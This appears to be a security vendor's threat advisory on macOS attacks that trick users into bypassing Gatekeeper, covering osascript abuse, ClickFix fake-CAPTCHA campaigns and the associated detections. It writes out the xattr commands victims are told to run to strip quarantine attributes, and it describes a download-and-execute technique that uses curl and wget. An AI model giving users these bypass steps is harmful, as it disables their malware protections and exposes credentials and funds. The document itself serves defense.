Systems Trust Controls are under active, repeated attack

MacOS systems are experiencing a significant surge in attacks specifically designed to bypass Apple's built-in security controls; Gatekeeper, XProtect, and quarantine protections. Threat actors have shifted from attempting to exploit technical vulnerabilities to exploiting user trust, using social engineering to trick users into disabling their own security protections. These attacks are succeeding because they don't rely on software bugs; instead, they manipulate legitimate macOS features and user behavior.

Business Impact:

• Credential Theft: Complete access to passwords, API keys, SSH keys, cloud credentials
• Cryptocurrency Loss: Wallet seed phrases stolen, funds drained (average loss: $18,000-$280,000 per victim)
• Intellectual Property: Source code, trade secrets, customer data exfiltrated
• Supply Chain Compromise: Developer access used to inject malware into production systems

Observed patterns:

Pattern 1: AppleScript Living-Off-the-Land Abuse

Technique: Attackers abuse osascript (Apple's legitimate AppleScript execution tool) to spawn shell processes that download and execute malicious payloads. This technique exploits the trust relationship between:

• AppleScript/Script Editor (signed by Apple, trusted)
• Shell interpreters (bash, zsh, sh)
• Network download tools (curl, wget, fetch)

Why It Works:

• No malicious files required initially - Attack starts with legitimate Apple binary (osascript)
• Bypasses Gatekeeper - osascript is signed by Apple and trusted by the system
• Living-off-the-land - Uses only tools already present on every macOS system
• User-assisted execution - Users click "Run" in Script Editor or execute commands from Terminal
• Multi-stage delivery - Initial .scpt file appears benign, downloads real payload during execution

Pattern 2: Gatekeeper/Quarantine Bypass

Technique: Users instructed to remove quarantine attributes via Terminal commands:

Common Commands:

• xattr -d com.apple.quarantine /path/to/application.app
• xattr -c /path/to/file (removes ALL extended attributes)
• xattr -r -d com.apple.quarantine /Applications/SuspiciousApp.app

Why It Works:

• macOS Gatekeeper only checks files with quarantine attributes
• Removing quarantine = no security warnings appear
• Users believe they're "fixing" a legitimate application
• Social engineering makes users disable their own protection

Distribution Methods:

• Fake Apple Support websites (SHAMOS campaign)
• ClickFix/FakeCAPTCHA pages with step-by-step instructions
• Reddit/forum posts claiming "solution" to app installation problems
• Malvertising redirecting to pages with "fix" instructions

• Detections (for Anvilogic customers):
  • Osascript spawning shell with suspicious commands
  • Gatekeeper Bypass via Quarantine Attribute Removal
  • AppleScript Social Engineering to Potential Malware Execution

Real-World Usage:

• SHAMOS Campaign: "Verify You Are Human" fake CAPTCHA instructing Terminal commands
• ClickFix Campaigns (2024-2025): 517% increase in H1 2025 (ESET), becoming #2 attack vector after phishing, accounting for 8% of all blocked attacks
  
• Malvertising: Google Ads leading to fake software sites requiring quarantine removal

‍